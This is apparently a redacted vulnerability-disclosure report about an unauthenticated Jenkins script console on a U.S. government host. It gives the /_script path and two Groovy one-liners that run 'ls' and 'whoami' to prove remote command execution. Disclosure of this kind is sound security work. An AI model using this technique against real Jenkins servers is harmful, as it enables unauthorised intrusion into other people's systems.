Unauth RCE on Jenkins Instance at https://█████████/

**Description:** Hi Team, While Doing Recon on U.s Government Sites, I Found below asset Belongs to U.S Government (Please Check its SSL certificate to confirm or Please check attached POC Video) █████████ https://███/ Attacker can execute Command Injection without Authentication. ## Impact Unauth RCE ## System Host(s) ███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce 1. Navigate to https://███████/_script 2. Please execute below commands to confirm Unauth RCE. Commands: println "ls".execute().text println "whoami".execute().text #POC Please check Attached POC Video to follow steps (If Required) ██████ ## Suggested Mitigation/Remediation Actions